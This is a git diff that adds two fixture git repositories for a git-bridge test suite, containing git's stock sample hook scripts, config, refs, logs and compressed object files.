b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. 
+# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. + exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". + +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-commit.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". 
+ +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. + +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. +exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. +# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push of commits where the log message starts +# with "WIP" (work in progress). 
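+# In the <local sha1>/<remote sha1> fields read below, an all-zero sha (the
+# z40 constant) marks a missing object: a zero local sha means the ref is
+# being deleted, and a zero remote sha means the remote ref does not exist
+# yet (a new branch).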
+ +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. + +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? +git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. 
+ else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". + +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. + +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". 
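The pre-rebase sample above closes by spelling out its two rev-list checks in prose. The following is a minimal stand-alone sketch of those same checks, not one of the committed sample hooks; the topic branch is taken as "$1" and the publish branch is hardcoded to "next" as placeholders.

#!/bin/sh
# Sketch of the two checks described in the sample above.
topic="$1"
publish=next

# (1) Has the topic ever been merged to "$publish"? If these two lists
# match, no commit of the topic has reached "$publish", so it can be
# rebased without rewriting published history.
only_next_1=$(git rev-list ^master "^$topic" "$publish" | sort)
only_next_2=$(git rev-list ^master "$publish" | sort)
if test "$only_next_1" = "$only_next_2"
then
	echo "$topic has not been merged to $publish; rebasing it is safe"
fi

# (2) Is the topic fully merged to master? An empty range means every
# commit on the topic is already contained in master.
if test -z "$(git rev-list "master..$topic")"
then
	echo "$topic is fully merged to master; it can be deleted"
fi

Both tests rely only on rev-list set subtraction, so they need no state beyond the repository itself.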
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. +# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. By default this is allowed. +# + +# --- Command line +refname="$1" +oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." 
>&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) 
+ echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/index new file mode 100644 index 0000000..c9459c6 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/HEAD new file mode 100644 index 0000000..87a3c02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/HEAD @@ -0,0 +1 @@ +0000000000000000000000000000000000000000 e5fc0d2678ec7b9bacf0bf514bac035fa371cb6e Winston Li <git@winston.li> 1471957665 +0100 commit (initial): Main diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..87a3c02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/refs/heads/master @@ -0,0 +1 @@ +0000000000000000000000000000000000000000 e5fc0d2678ec7b9bacf0bf514bac035fa371cb6e Winston Li <git@winston.li> 1471957665 +0100 commit (initial): Main diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/8b/6f970d184c1e097e6e6bae9b0eb03fec7796bf b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/8b/6f970d184c1e097e6e6bae9b0eb03fec7796bf new file mode 100644 index 0000000..63b4550 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/8b/6f970d184c1e097e6e6bae9b0eb03fec7796bf differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/e5/fc0d2678ec7b9bacf0bf514bac035fa371cb6e b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/e5/fc0d2678ec7b9bacf0bf514bac035fa371cb6e new file mode 100644 index 0000000..13bccfa --- /dev/null +++ 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/e5/fc0d2678ec7b9bacf0bf514bac035fa371cb6e
@@ -0,0 +1,2 @@
+[binary content omitted: zlib-deflated git loose object, not representable as text]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/f2/7f21327e2f0f53e9d8afab217fedaeea6a1cee b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/f2/7f21327e2f0f53e9d8afab217fedaeea6a1cee
new file mode 100644
index 0000000..d0cc2ae
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/f2/7f21327e2f0f53e9d8afab217fedaeea6a1cee differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/refs/heads/master
new file mode 100644
index 0000000..d9abf31
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/refs/heads/master
@@ -0,0 +1 @@
+e5fc0d2678ec7b9bacf0bf514bac035fa371cb6e
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/COMMIT_EDITMSG b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/COMMIT_EDITMSG
new file mode 100644
index 0000000..c098216
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/COMMIT_EDITMSG
@@ -0,0 +1 @@
+Main
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/HEAD
new file mode 100644
index 0000000..cb089cd
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/HEAD
@@ -0,0 +1 @@
+ref: refs/heads/master
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/config
new file mode 100644
index 0000000..6c9406b
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/config
@@ -0,0 +1,7 @@
+[core]
+	repositoryformatversion = 0
+	filemode = true
+	bare = false
+	logallrefupdates = true
+	ignorecase = true
+	precomposeunicode = true
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/description
new file mode 100644
index 0000000..498b267
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/description
@@ -0,0 +1 @@
+Unnamed repository; edit this file 'description' to name the repository.
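Each of these fixture repositories keeps its git metadata under a directory named DOTgit rather than .git, since a nested directory literally named .git could not be checked in as ordinary files of the parent repository. A hypothetical setup sketch, assuming the tests copy a fixture aside and restore the real name before opening it (the temporary location and the rename step are assumptions, not taken from FSGitRepoStoreTest itself):

#!/bin/sh
# Materialise one fixture as a usable git repository (illustrative only).
fixture=services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1
work=$(mktemp -d)
cp -r "$fixture" "$work/proj1"
mv "$work/proj1/DOTgit" "$work/proj1/.git"  # restore the real metadata name
git -C "$work/proj1" log --oneline          # fixture history is now readable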
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. +# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. + exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". 
+ +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-commit.sample 